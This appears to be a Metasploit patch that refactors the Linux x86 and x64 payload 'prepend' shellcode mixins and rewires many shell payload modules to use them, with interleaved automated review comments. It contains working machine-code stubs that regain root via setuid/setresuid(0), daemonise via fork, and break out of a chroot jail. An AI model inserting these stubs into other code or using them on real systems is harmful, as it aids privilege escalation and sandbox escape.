@@ -1,130 +1,132 @@ -module Msf - module Payload::Linux::X64::Prepends - include Msf::Payload::Linux::Prepends - def prepends_order - %w[PrependFork PrependSetresuid PrependSetreuid PrependSetuid] - end - - def appends_order - %w[] - end - - def prepends_map - { 'PrependFork' => "\x6a\x39" + # push 57 ; __NR_fork # - "\x58" + # pop rax # - "\x0f\x05" + # syscall # - "\x48\x85\xc0" + # test rax,rax # - "\x74\x08" + # jz loc_0012 # - # loc_000a: # - "\x48\x31\xff" + # xor rdi,rdi # - "\x6a\x3c" + # push 60 ; __NR_exit # - "\x58" + # pop rax # - "\x0f\x05" + # syscall # - # loc_0012: # - "\x04\x70" + # add al, 112 ; __NR_setsid # - "\x0f\x05" + # syscall # - "\x6a\x39" + # push 57 ; __NR_fork # - "\x58" + # pop rax # - "\x0f\x05" + # syscall # - "\x48\x85\xc0" + # test rax,rax # - "\x75\xea", # jnz loc_000a # +# +# Linux x64 Prepends file +# +module Msf::Payload::Linux::X64::Prepends + include Msf::Payload::Linux::Prepends + def prepends_order + %w[PrependFork PrependSetresuid PrependSetreuid PrependSetuid] + end + + def appends_order + %w[] + end - # setresuid(0, 0, 0) - 'PrependSetresuid' => "\x48\x31\xff" + # xor rdi,rdi # - "\x48\x89\xfe" + # mov rsi,rdi # - "\x6a\x75" + # push 0x75 # - "\x58" + # pop rax # - "\x0f\x05", # syscall # + def prepends_map + { + 'PrependFork' => "\x6a\x39" + # push 57 ; __NR_fork # + "\x58" + # pop rax # + "\x0f\x05" + # syscall # + "\x48\x85\xc0" + # test rax,rax # + "\x74\x08" + # jz loc_0012 # + # loc_000a: # + "\x48\x31\xff" + # xor rdi,rdi # + "\x6a\x3c" + # push 60 ; __NR_exit # + "\x58" + # pop rax # + "\x0f\x05" + # syscall # + # loc_0012: # + "\x04\x70" + # add al, 112 ; __NR_setsid # + "\x0f\x05" + # syscall # + "\x6a\x39" + # push 57 ; __NR_fork # + "\x58" + # pop rax # + "\x0f\x05" + # syscall # + "\x48\x85\xc0" + # test rax,rax # + "\x75\xea", # jnz loc_000a # - # setreuid(0, 0) - 'PrependSetreuid' => "\x48\x31\xff" + # xor rdi,rdi # - "\x48\x89\xfe" + # mov rsi,rdi # - "\x48\x89\xf2" + # mov rdx,rsi # - "\x6a\x71" + # 
push 0x71 # - "\x58" + # pop rax # - "\x0f\x05", # syscall # + # setresuid(0, 0, 0) + 'PrependSetresuid' => "\x48\x31\xff" + # xor rdi,rdi # + "\x48\x89\xfe" + # mov rsi,rdi # + "\x6a\x75" + # push 0x75 # + "\x58" + # pop rax # + "\x0f\x05", # syscall # - # setuid(0) - 'PrependSetuid' => "\x48\x31\xff" + # xor rdi,rdi # - "\x6a\x69" + # push 0x69 # - "\x58" + # pop rax # - "\x0f\x05", # syscall # + # setreuid(0, 0) + 'PrependSetreuid' => "\x48\x31\xff" + # xor rdi,rdi # + "\x48\x89\xfe" + # mov rsi,rdi # + "\x48\x89\xf2" + # mov rdx,rsi # + "\x6a\x71" + # push 0x71 # + "\x58" + # pop rax # + "\x0f\x05", # syscall # - # setresgid(0, 0, 0) - 'PrependSetresgid' => "\x48\x31\xff" + # xor rdi,rdi # - "\x48\x89\xfe" + # mov rsi,rdi # - "\x6a\x77" + # push 0x77 # - "\x58" + # pop rax # - "\x0f\x05", # syscall # + # setuid(0) + 'PrependSetuid' => "\x48\x31\xff" + # xor rdi,rdi # + "\x6a\x69" + # push 0x69 # + "\x58" + # pop rax # + "\x0f\x05", # syscall # - # setregid(0, 0) - 'PrependSetregid' => "\x48\x31\xff" + # xor rdi,rdi # - "\x48\x89\xfe" + # mov rsi,rdi # - "\x48\x89\xf2" + # mov rdx,rsi # - "\x6a\x72" + # push 0x72 # - "\x58" + # pop rax # - "\x0f\x05", # syscall # + # setresgid(0, 0, 0) + 'PrependSetresgid' => "\x48\x31\xff" + # xor rdi,rdi # + "\x48\x89\xfe" + # mov rsi,rdi # + "\x6a\x77" + # push 0x77 # + "\x58" + # pop rax # + "\x0f\x05", # syscall # - # setgid(0) - 'PrependSetgid' => "\x48\x31\xff" + # xor rdi,rdi # - "\x6a\x6a" + # push 0x6a # - "\x58" + # pop rax # - "\x0f\x05", # syscall # - - # setreuid(0, 0) + break chroot - 'PrependChrootBreak' => "\x48\x31\xff" + # xor rdi,rdi # - "\x48\x89\xfe" + # mov rsi,rdi # - "\x48\x89\xf8" + # mov rax,rdi # - "\xb0\x71" + # mov al,0x71 # - "\x0f\x05" + # syscall # - # generate temp dir name - "\x48\xbf#{Rex::Text.rand_text_alpha(8)}" + # mov rdi, # - "\x56" + # push rsi # - "\x57" + # push rdi # - # mkdir(random,0755) - "\x48\x89\xe7" + # mov rdi,rsp # - "\x66\xbe\xed\x01" + # mov si,0755 # - "\x6a\x53" + # push 
0x53 # - "\x58" + # pop rax # - "\x0f\x05" + # syscall # + # setregid(0, 0) + 'PrependSetregid' => "\x48\x31\xff" + # xor rdi,rdi # + "\x48\x89\xfe" + # mov rsi,rdi # + "\x48\x89\xf2" + # mov rdx,rsi # + "\x6a\x72" + # push 0x72 # + "\x58" + # pop rax # + "\x0f\x05", # syscall # - # chroot(random) - "\x48\x31\xd2" + # xor rdx,rdx # - "\xb2\xa1" + # mov dl,0xa1 # - "\x48\x89\xd0" + # mov rax,rdx # - "\x0f\x05" + # syscall # + # setgid(0) + 'PrependSetgid' => "\x48\x31\xff" + # xor rdi,rdi # + "\x6a\x6a" + # push 0x6a # + "\x58" + # pop rax # + "\x0f\x05", # syscall # - # build .. (ptr in rdi ) - "\x66\xbe\x2e\x2e" + # mov si,0x2e2e # - "\x56" + # push rsi # - "\x48\x89\xe7" + # mov rdi,rsp # + # setreuid(0, 0) + break chroot + 'PrependChrootBreak' => "\x48\x31\xff" + # xor rdi,rdi # + "\x48\x89\xfe" + # mov rsi,rdi # + "\x48\x89\xf8" + # mov rax,rdi # + "\xb0\x71" + # mov al,0x71 # + "\x0f\x05" + # syscall # + # generate temp dir name + "\x48\xbf#{Rex::Text.rand_text_alpha(8)}" + # mov rdi, # + "\x56" + # push rsi # + "\x57" + # push rdi # + # mkdir(random,0755) + "\x48\x89\xe7" + # mov rdi,rsp # + "\x66\xbe\xed\x01" + # mov si,0755 # + "\x6a\x53" + # push 0x53 # + "\x58" + # pop rax # + "\x0f\x05" + # syscall # - # loop chdir(..) 69 times - # syscall tend to modify rcx can't use loop... - "\x6a\x45" + # push 0x45 # - "\x5b" + # pop rbx # - "\x6a\x50" + # push 0x50 # - "\x58" + # pop rax # - "\x0f\x05" + # syscall # - "\xfe\xcb" + # dec bl # - "\x75\xf7" + # jnz -7 # + # chroot(random) + "\x48\x31\xd2" + # xor rdx,rdx # + "\xb2\xa1" + # mov dl,0xa1 # + "\x48\x89\xd0" + # mov rax,rdx # + "\x0f\x05" + # syscall # - # chroot (.) (which should be /) - "\x6a\x2e" + # push . (0x2e) # - "\x48\x89\xe7" + # mov rdi,rsp # - "\x48\x89\xd0" + # mov rax,rdx # - "\x0f\x05" # syscall # - } - end + # build .. (ptr in rdi ) + "\x66\xbe\x2e\x2e" + # mov si,0x2e2e # + "\x56" + # push rsi # + "\x48\x89\xe7" + # mov rdi,rsp # + + # loop chdir(..) 
69 times + # syscall tend to modify rcx can't use loop... + "\x6a\x45" + # push 0x45 # + "\x5b" + # pop rbx # + "\x6a\x50" + # push 0x50 # + "\x58" + # pop rax # + "\x0f\x05" + # syscall # + "\xfe\xcb" + # dec bl # + "\x75\xf7" + # jnz -7 # + + # chroot (.) (which should be /) + "\x6a\x2e" + # push . (0x2e) # + "\x48\x89\xe7" + # mov rdi,rsp # + "\x48\x89\xd0" + # mov rax,rdx # + "\x0f\x05" + } # syscall # + end - def appends_map - { - # exit(0) - 'AppendExit' => "\x48\x31\xff" + # xor rdi,rdi # - "\x6a\x3c" + # push 0x3c # - "\x58" + # pop rax # - "\x0f\x05", # syscall # - } - end + def appends_map + { + # exit(0) + 'AppendExit' => "\x48\x31\xff" + # xor rdi,rdi # + "\x6a\x3c" + # push 0x3c # + "\x58" + # pop rax # + "\x0f\x05" # syscall # + } end -end \ No newline at end of file +end diff --git a/lib/msf/core/payload/linux/x86/prepends.rb b/lib/msf/core/payload/linux/x86/prepends.rb index 461d4b8c4fee..2802967d63d5 100644 --- a/lib/msf/core/payload/linux/x86/prepends.rb +++ b/lib/msf/core/payload/linux/x86/prepends.rb 
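Review bot: `PrependSetresuid` and `PrependSetresgid` never zero `rdx`, so the third argument of setresuid(0, 0, suid)/setresgid(0, 0, sgid) is whatever the register happens to hold when the stub runs, while the two-argument `PrependSetreuid`/`PrependSetregid` stubs zero `rdx` needlessly — it looks like the register setup was swapped between the two- and three-argument variants. Each three-argument stub needs `"\x48\x89\xf2" + # mov rdx,rsi #` inserted before its `push`, and the redundant `mov rdx,rsi` can be dropped from the two-argument ones. Separately, `PrependSetresgid`, `PrependSetregid`, `PrependSetgid` and `PrependChrootBreak` are present in `prepends_map`, and `AppendExit` in `appends_map`, but none of them appear in `prepends_order`/`appends_order`, so they are never registered as options and are unreachable; if that is intentional a comment should say why. The autoformat also moved the trailing `# syscall #` comment of `PrependChrootBreak` past the closing `}`; it belongs on the final `"\x0f\x05"` line.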
@@ -1,117 +1,118 @@ -module Msf - module Payload::Linux::X86::Prepends - def prepends_order - %w[PrependFork PrependSetresuid PrependSetreuid PrependSetuid PrependSetresgid PrependSetregid PrependSetgid PrependChrootBreak] - end +# +# Linux x86 prepends +# +module Msf::Payload::Linux::X86::Prepends + def prepends_order + %w[PrependFork PrependSetresuid PrependSetreuid PrependSetuid PrependSetresgid PrependSetregid PrependSetgid PrependChrootBreak] + end - def appends_order - %w[AppendExit] - end - def prepends_map - { - 'PrependFork' => "\x6a\x02" + # pushb $0x2 # - "\x58" + # popl %eax # - "\xcd\x80" + # int $0x80 ; fork # - "\x85\xc0" + # test %eax,%eax # - "\x74\x06" + # jz loc_000f # - # loc_0009: - "\x31\xc0" + # xor %eax,%eax # - "\xb0\x01" + # movb $0x1,%al # - "\xcd\x80" + # int $0x80 ; exit # - # loc_000f: - "\xb0\x42" + # movb %0x42,%al # - "\xcd\x80" + # int $0x80 ; setsid # - "\x6a\x02" + # pushb $0x2 # - "\x58" + # popl %eax # - "\xcd\x80" + # int $0x80 ; fork # - "\x85\xc0" + # test %eax,%eax # - "\x75\xed", # jnz loc_0009 # + def appends_order + %w[AppendExit] + end - # setresuid(0, 0, 0) - 'PrependSetresuid' => "\x31\xc9" + # xorl %ecx,%ecx # - "\x31\xdb" + # xorl %ebx,%ebx # - "\xf7\xe3" + # mull %ebx # - "\xb0\xa4" + # movb $0xa4,%al # - "\xcd\x80", # int $0x80 # + def prepends_map + { + 'PrependFork' => "\x6a\x02" + # pushb $0x2 # + "\x58" + # popl %eax # + "\xcd\x80" + # int $0x80 ; fork # + "\x85\xc0" + # test %eax,%eax # + "\x74\x06" + # jz loc_000f # + # loc_0009: + "\x31\xc0" + # xor %eax,%eax # + "\xb0\x01" + # movb $0x1,%al # + "\xcd\x80" + # int $0x80 ; exit # + # loc_000f: + "\xb0\x42" + # movb %0x42,%al # + "\xcd\x80" + # int $0x80 ; setsid # + "\x6a\x02" + # pushb $0x2 # + "\x58" + # popl %eax # + "\xcd\x80" + # int $0x80 ; fork # + "\x85\xc0" + # test %eax,%eax # + "\x75\xed", # jnz loc_0009 # - # setreuid(0, 0) - 'PrependSetreuid' => "\x31\xc9" + # xorl %ecx,%ecx # - "\x31\xdb" + # xorl %ebx,%ebx # - "\x6a\x46" + # pushl $0x46 # - 
"\x58" + # popl %eax # - "\xcd\x80", # int $0x80 # + # setresuid(0, 0, 0) + 'PrependSetresuid' => "\x31\xc9" + # xorl %ecx,%ecx # + "\x31\xdb" + # xorl %ebx,%ebx # + "\xf7\xe3" + # mull %ebx # + "\xb0\xa4" + # movb $0xa4,%al # + "\xcd\x80", # int $0x80 # - # setuid(0) - 'PrependSetuid' => "\x31\xdb" + # xorl %ebx,%ebx # - "\x6a\x17" + # pushl $0x17 # - "\x58" + # popl %eax # - "\xcd\x80", # int $0x80 # + # setreuid(0, 0) + 'PrependSetreuid' => "\x31\xc9" + # xorl %ecx,%ecx # + "\x31\xdb" + # xorl %ebx,%ebx # + "\x6a\x46" + # pushl $0x46 # + "\x58" + # popl %eax # + "\xcd\x80", # int $0x80 # - # setresgid(0, 0, 0) - 'PrependSetresgid' => "\x31\xc9" + # xorl %ecx,%ecx # - "\x31\xdb" + # xorl %ebx,%ebx # - "\xf7\xe3" + # mull %ebx # - "\xb0\xaa" + # movb $0xaa,%al # - "\xcd\x80", # int $0x80 # + # setuid(0) + 'PrependSetuid' => "\x31\xdb" + # xorl %ebx,%ebx # + "\x6a\x17" + # pushl $0x17 # + "\x58" + # popl %eax # + "\xcd\x80", # int $0x80 # - # setregid(0, 0) - 'PrependSetregid' => "\x31\xc9" + # xorl %ecx,%ecx # - "\x31\xdb" + # xorl %ebx,%ebx # - "\x6a\x47" + # pushl $0x47 # - "\x58" + # popl %eax # - "\xcd\x80", # int $0x80 # + # setresgid(0, 0, 0) + 'PrependSetresgid' => "\x31\xc9" + # xorl %ecx,%ecx # + "\x31\xdb" + # xorl %ebx,%ebx # + "\xf7\xe3" + # mull %ebx # + "\xb0\xaa" + # movb $0xaa,%al # + "\xcd\x80", # int $0x80 # - # setgid(0) - 'PrependSetgid' => "\x31\xdb" + # xorl %ebx,%ebx # - "\x6a\x2e" + # pushl $0x2e # - "\x58" + # popl %eax # - "\xcd\x80", # int $0x80 # + # setregid(0, 0) + 'PrependSetregid' => "\x31\xc9" + # xorl %ecx,%ecx # + "\x31\xdb" + # xorl %ebx,%ebx # + "\x6a\x47" + # pushl $0x47 # + "\x58" + # popl %eax # + "\xcd\x80", # int $0x80 # - # setreuid(0, 0) = break chroot - 'PrependChrootBreak' => "\x31\xc9" + # xorl %ecx,%ecx # - "\x31\xdb" + # xorl %ebx,%ebx # - "\x6a\x46" + # pushl $0x46 # - "\x58" + # popl %eax # - "\xcd\x80" + # int $0x80 # - "\x6a\x3d" + # pushl $0x3d # - # build dir str (ptr in ebx) - "\x89\xe3" + # movl %esp,%ebx # 
- # mkdir(dir) - "\x6a\x27" + # pushl $0x27 # - "\x58" + # popl %eax # - "\xcd\x80" + # int $0x80 # - # chroot(dir) - "\x89\xd9" + # movl %ebx,%ecx # - "\x58" + # popl %eax # - "\xcd\x80" + # int $0x80 # - # build ".." str (ptr in ebx) - "\x31\xc0" + # xorl %eax,%eax # - "\x50" + # pushl %eax # + # setgid(0) + 'PrependSetgid' => "\x31\xdb" + # xorl %ebx,%ebx # + "\x6a\x2e" + # pushl $0x2e # + "\x58" + # popl %eax # + "\xcd\x80", # int $0x80 # - "\x66\x68\x2e\x2e" + # pushw $0x2e2e # - "\x89\xe3" + # movl %esp,%ebx # - # loop changing dir - "\x6a\x3d" + # pushl $0x1e # - "\x59" + # popl %ecx # - "\xb0\x0c" + # movb $0xc,%al # - "\xcd\x80" + # int $0x80 # - "\xe2\xfa" + # loop -6 # - # final chroot - "\x6a\x3d" + # pushl $0x3d # - "\x89\xd9" + # movl %ebx,%ecx # - "\x58" + # popl %eax # - "\xcd\x80" # int $0x80 # - } - end + # setreuid(0, 0) = break chroot + 'PrependChrootBreak' => "\x31\xc9" + # xorl %ecx,%ecx # + "\x31\xdb" + # xorl %ebx,%ebx # + "\x6a\x46" + # pushl $0x46 # + "\x58" + # popl %eax # + "\xcd\x80" + # int $0x80 # + "\x6a\x3d" + # pushl $0x3d # + # build dir str (ptr in ebx) + "\x89\xe3" + # movl %esp,%ebx # + # mkdir(dir) + "\x6a\x27" + # pushl $0x27 # + "\x58" + # popl %eax # + "\xcd\x80" + # int $0x80 # + # chroot(dir) + "\x89\xd9" + # movl %ebx,%ecx # + "\x58" + # popl %eax # + "\xcd\x80" + # int $0x80 # + # build ".." 
str (ptr in ebx) + "\x31\xc0" + # xorl %eax,%eax # + "\x50" + # pushl %eax # + "\x66\x68\x2e\x2e" + # pushw $0x2e2e # + "\x89\xe3" + # movl %esp,%ebx # + # loop changing dir + "\x6a\x3d" + # pushl $0x1e # + "\x59" + # popl %ecx # + "\xb0\x0c" + # movb $0xc,%al # + "\xcd\x80" + # int $0x80 # + "\xe2\xfa" + # loop -6 # + # final chroot + "\x6a\x3d" + # pushl $0x3d # + "\x89\xd9" + # movl %ebx,%ecx # + "\x58" + # popl %eax # + "\xcd\x80" # int $0x80 # + } + end - def appends_map - { - # exit(0) - 'AppendExit' => "\x31\xdb" + # xorl %ebx,%ebx # - "\x6a\x01" + # pushl $0x01 # - "\x58" + # popl %eax # - "\xcd\x80" # int $0x80 # - } - end + def appends_map + { + # exit(0) + 'AppendExit' => "\x31\xdb" + # xorl %ebx,%ebx # + "\x6a\x01" + # pushl $0x01 # + "\x58" + # popl %eax # + "\xcd\x80" # int $0x80 # + } end -end \ No newline at end of file +end From 4565a04510bf476af9532a6c35778bcac7aa13bf Mon Sep 17 00:00:00 2001 
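Review bot: `Msf::Payload::Linux::X86::Prepends` does not `include Msf::Payload::Linux::Prepends`, unlike the x64, armle, ppc and aarch64 modules, so a payload that replaces `Msf::Payload::Linux` with this mixin (as the later hunks do for `bind_tcp.rb` and `reverse_tcp_x86.rb`) gets neither `register_prepend_options` nor the `apply_prepends` that consults `prepends_map`; the Prepend*/AppendExit options would silently vanish and the stubs would never be emitted, unless something outside this diff mixes the shared module in. Add `include Msf::Payload::Linux::Prepends` directly under the `module` line, matching the x64 file. Also, in `PrependChrootBreak` the loop-counter comment `"\x6a\x3d" + # pushl $0x1e #` disagrees with the byte that is pushed (0x3d, i.e. 61 chdir iterations); it should read `# pushl $0x3d #`.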
From: dledda-r7 Date: Tue, 14 Jan 2025 09:31:03 -0500 Subject: [PATCH 10/12] fix(payloads): updating prepend mixin in payloads --- lib/msf/core/payload/linux/bind_tcp.rb | 2 +- lib/msf/core/payload/linux/reverse_tcp_x86.rb | 2 +- lib/msf/core/payload/linux/x64/reverse_sctp.rb | 2 +- lib/msf/core/payload/linux/x64/reverse_tcp.rb | 2 +- modules/payloads/singles/apple_ios/aarch64/shell_reverse_tcp.rb | 1 - modules/payloads/singles/linux/armbe/shell_bind_tcp.rb | 1 - modules/payloads/singles/linux/armle/adduser.rb | 2 +- modules/payloads/singles/linux/armle/exec.rb | 2 +- modules/payloads/singles/linux/armle/shell_bind_tcp.rb | 2 +- modules/payloads/singles/linux/armle/shell_reverse_tcp.rb | 2 +- modules/payloads/singles/linux/mipsbe/exec.rb | 1 - modules/payloads/singles/linux/mipsbe/reboot.rb | 1 - modules/payloads/singles/linux/mipsbe/shell_bind_tcp.rb | 1 - modules/payloads/singles/linux/mipsbe/shell_reverse_tcp.rb | 1 - modules/payloads/singles/linux/mipsle/exec.rb | 1 - modules/payloads/singles/linux/mipsle/reboot.rb | 1 - modules/payloads/singles/linux/mipsle/shell_bind_tcp.rb | 1 - modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb | 1 - modules/payloads/singles/linux/ppc64/shell_bind_tcp.rb | 2 +- modules/payloads/singles/linux/ppc64/shell_find_port.rb | 2 +- modules/payloads/singles/linux/ppc64/shell_reverse_tcp.rb | 2 +- modules/payloads/singles/linux/riscv32le/exec.rb | 1 - modules/payloads/singles/linux/riscv32le/reboot.rb | 1 - modules/payloads/singles/linux/riscv64le/exec.rb | 1 - modules/payloads/singles/linux/riscv64le/reboot.rb | 1 - modules/payloads/singles/linux/x64/exec.rb | 2 +- modules/payloads/singles/linux/x64/pingback_bind_tcp.rb | 2 +- modules/payloads/singles/linux/x64/pingback_reverse_tcp.rb | 2 +- modules/payloads/singles/linux/x64/shell_bind_ipv6_tcp.rb | 2 +- modules/payloads/singles/linux/x64/shell_bind_tcp.rb | 2 +- .../payloads/singles/linux/x64/shell_bind_tcp_random_port.rb | 2 +- 
modules/payloads/singles/linux/x64/shell_find_port.rb | 2 +- modules/payloads/singles/linux/x64/shell_reverse_ipv6_tcp.rb | 2 +- modules/payloads/singles/linux/x64/shell_reverse_tcp.rb | 2 +- modules/payloads/singles/linux/x86/adduser.rb | 2 +- modules/payloads/singles/linux/x86/chmod.rb | 2 +- modules/payloads/singles/linux/x86/exec.rb | 2 +- modules/payloads/singles/linux/x86/metsvc_bind_tcp.rb | 2 +- modules/payloads/singles/linux/x86/metsvc_reverse_tcp.rb | 2 +- modules/payloads/singles/linux/x86/read_file.rb | 2 +- modules/payloads/singles/linux/x86/shell_bind_ipv6_tcp.rb | 2 +- modules/payloads/singles/linux/x86/shell_bind_tcp.rb | 2 +- .../payloads/singles/linux/x86/shell_bind_tcp_random_port.rb | 2 +- modules/payloads/singles/linux/x86/shell_find_port.rb | 2 +- modules/payloads/singles/linux/x86/shell_find_tag.rb | 2 +- modules/payloads/singles/linux/x86/shell_reverse_tcp.rb | 2 +- modules/payloads/singles/linux/x86/shell_reverse_tcp_ipv6.rb | 2 +- modules/payloads/stagers/linux/aarch64/reverse_tcp.rb | 1 + modules/payloads/stagers/linux/armle/bind_tcp.rb | 1 + modules/payloads/stagers/linux/armle/reverse_tcp.rb | 1 + modules/payloads/stagers/linux/x64/bind_tcp.rb | 2 +- modules/payloads/stagers/linux/x86/bind_nonx_tcp.rb | 2 +- modules/payloads/stagers/linux/x86/find_tag.rb | 2 +- modules/payloads/stagers/linux/x86/reverse_ipv6_tcp.rb | 2 +- modules/payloads/stagers/linux/x86/reverse_nonx_tcp.rb | 2 +- modules/payloads/stages/linux/x64/shell.rb | 2 +- modules/payloads/stages/linux/x86/shell.rb | 2 +- 57 files changed, 43 insertions(+), 54 deletions(-) diff --git a/lib/msf/core/payload/linux/bind_tcp.rb b/lib/msf/core/payload/linux/bind_tcp.rb index 457071059a38..5b8c1a941710 100644 --- a/lib/msf/core/payload/linux/bind_tcp.rb +++ b/lib/msf/core/payload/linux/bind_tcp.rb 
@@ -13,7 +13,7 @@ module Msf
 module Payload::Linux::BindTcp
   include Msf::Payload::TransportConfig
-  include Msf::Payload::Linux
+  include Msf::Payload::Linux::X86::Prepends
   include Msf::Payload::Linux::SendUUID
   #
diff --git a/lib/msf/core/payload/linux/reverse_tcp_x86.rb b/lib/msf/core/payload/linux/reverse_tcp_x86.rb
index 738645343fe7..f99e08864c23 100644
--- a/lib/msf/core/payload/linux/reverse_tcp_x86.rb
+++ b/lib/msf/core/payload/linux/reverse_tcp_x86.rb
@@ -12,7 +12,7 @@ module Msf
 module Payload::Linux::ReverseTcp_x86
   include Msf::Payload::TransportConfig
-  include Msf::Payload::Linux
+  include Msf::Payload::Linux::X86::Prepends
   include Msf::Payload::Linux::SendUUID
   #
diff --git a/lib/msf/core/payload/linux/x64/reverse_sctp.rb b/lib/msf/core/payload/linux/x64/reverse_sctp.rb
index 1229fe5610b5..ac71bdfccd2f 100644
--- a/lib/msf/core/payload/linux/x64/reverse_sctp.rb
+++ b/lib/msf/core/payload/linux/x64/reverse_sctp.rb
@@ -12,7 +12,7 @@ module Msf
 module Payload::Linux::X64::ReverseSctp
   include Msf::Payload::TransportConfig
-  include Msf::Payload::Linux
+  include Msf::Payload::Linux::X64::Prepends
   #
   # Generate the first stage
diff --git a/lib/msf/core/payload/linux/x64/reverse_tcp.rb b/lib/msf/core/payload/linux/x64/reverse_tcp.rb
index 67d94505c583..3f89f68a7144 100644
--- a/lib/msf/core/payload/linux/x64/reverse_tcp.rb
+++ b/lib/msf/core/payload/linux/x64/reverse_tcp.rb
@@ -12,7 +12,7 @@ module Msf
 module Payload::Linux::X64::ReverseTcp
   include Msf::Payload::TransportConfig
-  include Msf::Payload::Linux
+  include Msf::Payload::Linux::X64::Prepends
   #
   # Generate the first stage
diff --git a/modules/payloads/singles/apple_ios/aarch64/shell_reverse_tcp.rb b/modules/payloads/singles/apple_ios/aarch64/shell_reverse_tcp.rb
index 7c5de45bf0c4..ae0786c10440 100644
--- a/modules/payloads/singles/apple_ios/aarch64/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/apple_ios/aarch64/shell_reverse_tcp.rb
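Review bot: `Msf::Payload::Linux::BindTcp` in lib/msf/core/payload/linux/bind_tcp.rb now hard-wires `include Msf::Payload::Linux::X86::Prepends`, yet unlike `ReverseTcp_x86` in the next hunk nothing in the module or file name says this transport mixin is x86-only. If any non-x86 stager includes it, x86 fork/setuid stubs would be prepended to another architecture's shellcode at generation time; if it is only ever consumed by x86 stagers, a one-line comment above the include, `# x86-only transport mixin: it carries the x86 prepend stubs`, or moving the Prepends include into the consuming modules (as the armle stagers in this patch do) makes that coupling visible. The enclosing module continues outside the hunk.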
@@ -9,7 +9,6 @@ module MetasploitModule
   CachedSize = 152
   include Msf::Payload::Single
-  include Msf::Payload::Linux
   include Msf::Sessions::CommandShellOptions
   def initialize(info = {})
diff --git a/modules/payloads/singles/linux/armbe/shell_bind_tcp.rb b/modules/payloads/singles/linux/armbe/shell_bind_tcp.rb
index ec1a63195a7b..e8a76d082e13 100644
--- a/modules/payloads/singles/linux/armbe/shell_bind_tcp.rb
+++ b/modules/payloads/singles/linux/armbe/shell_bind_tcp.rb
@@ -9,7 +9,6 @@ module MetasploitModule
   CachedSize = 118
   include Msf::Payload::Single
-  include Msf::Payload::Linux
   include Msf::Sessions::CommandShellOptions
   def initialize(info = {})
diff --git a/modules/payloads/singles/linux/armle/adduser.rb b/modules/payloads/singles/linux/armle/adduser.rb
index 58db13ad4f52..2d7d5da0b15e 100644
--- a/modules/payloads/singles/linux/armle/adduser.rb
+++ b/modules/payloads/singles/linux/armle/adduser.rb
@@ -16,7 +16,7 @@ module MetasploitModule
   CachedSize = 119
   include Msf::Payload::Single
-  include Msf::Payload::Linux
+  include Msf::Payload::Linux::Armle::Prepends
   def initialize(info = {})
     super(merge_info(info,
diff --git a/modules/payloads/singles/linux/armle/exec.rb b/modules/payloads/singles/linux/armle/exec.rb
index ba4e48c7be0d..896a448e31a4 100644
--- a/modules/payloads/singles/linux/armle/exec.rb
+++ b/modules/payloads/singles/linux/armle/exec.rb
@@ -16,7 +16,7 @@ module MetasploitModule
   CachedSize = 29
   include Msf::Payload::Single
-  include Msf::Payload::Linux
+  include Msf::Payload::Linux::Armle::Prepends
   def initialize(info = {})
     super(merge_info(info,
diff --git a/modules/payloads/singles/linux/armle/shell_bind_tcp.rb b/modules/payloads/singles/linux/armle/shell_bind_tcp.rb
index 3152c584709f..ae8779831d41 100644
--- a/modules/payloads/singles/linux/armle/shell_bind_tcp.rb
+++ b/modules/payloads/singles/linux/armle/shell_bind_tcp.rb
@@ -9,7 +9,7 @@ module MetasploitModule
   CachedSize = 208
   include Msf::Payload::Single
-  include Msf::Payload::Linux
+  include Msf::Payload::Linux::Armle::Prepends
   include Msf::Sessions::CommandShellOptions
   def initialize(info = {})
diff --git a/modules/payloads/singles/linux/armle/shell_reverse_tcp.rb b/modules/payloads/singles/linux/armle/shell_reverse_tcp.rb
index 32bcbe2c4301..9ee7eb5dcdbf 100644
--- a/modules/payloads/singles/linux/armle/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/armle/shell_reverse_tcp.rb
@@ -9,7 +9,7 @@ module MetasploitModule
   CachedSize = 172
   include Msf::Payload::Single
-  include Msf::Payload::Linux
+  include Msf::Payload::Linux::Armle::Prepends
   include Msf::Sessions::CommandShellOptions
   def initialize(info = {})
diff --git a/modules/payloads/singles/linux/mipsbe/exec.rb b/modules/payloads/singles/linux/mipsbe/exec.rb
index 85d4c61b7f75..965222627335 100644
--- a/modules/payloads/singles/linux/mipsbe/exec.rb
+++ b/modules/payloads/singles/linux/mipsbe/exec.rb
@@ -10,7 +10,6 @@ module MetasploitModule
   CachedSize = 52
   include Msf::Payload::Single
-  include Msf::Payload::Linux
   def initialize(info = {})
     super(merge_info(info,
diff --git a/modules/payloads/singles/linux/mipsbe/reboot.rb b/modules/payloads/singles/linux/mipsbe/reboot.rb
index a16cf8ab783a..1b65babdb45c 100644
--- a/modules/payloads/singles/linux/mipsbe/reboot.rb
+++ b/modules/payloads/singles/linux/mipsbe/reboot.rb
@@ -8,7 +8,6 @@ module MetasploitModule
   CachedSize = 32
   include Msf::Payload::Single
-  include Msf::Payload::Linux
   def initialize(info = {})
     super(merge_info(info,
diff --git a/modules/payloads/singles/linux/mipsbe/shell_bind_tcp.rb b/modules/payloads/singles/linux/mipsbe/shell_bind_tcp.rb
index 31e039c93f42..3c490f9a114d 100644
--- a/modules/payloads/singles/linux/mipsbe/shell_bind_tcp.rb
+++ b/modules/payloads/singles/linux/mipsbe/shell_bind_tcp.rb
@@ -9,7 +9,6 @@ module MetasploitModule
   CachedSize = 232
   include Msf::Payload::Single
-  include Msf::Payload::Linux
   include Msf::Sessions::CommandShellOptions
   def initialize(info = {})
diff --git a/modules/payloads/singles/linux/mipsbe/shell_reverse_tcp.rb b/modules/payloads/singles/linux/mipsbe/shell_reverse_tcp.rb
index 1ef5c4ec2373..cefb61fb45e5 100644
--- a/modules/payloads/singles/linux/mipsbe/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/mipsbe/shell_reverse_tcp.rb
@@ -9,7 +9,6 @@ module MetasploitModule
   CachedSize = 184
   include Msf::Payload::Single
-  include Msf::Payload::Linux
   include Msf::Sessions::CommandShellOptions
   def initialize(info = {})
diff --git a/modules/payloads/singles/linux/mipsle/exec.rb b/modules/payloads/singles/linux/mipsle/exec.rb
index 0b8873ded27f..e1299a814a5f 100644
--- a/modules/payloads/singles/linux/mipsle/exec.rb
+++ b/modules/payloads/singles/linux/mipsle/exec.rb
@@ -10,7 +10,6 @@ module MetasploitModule
   CachedSize = 52
   include Msf::Payload::Single
-  include Msf::Payload::Linux
   def initialize(info = {})
     super(merge_info(info,
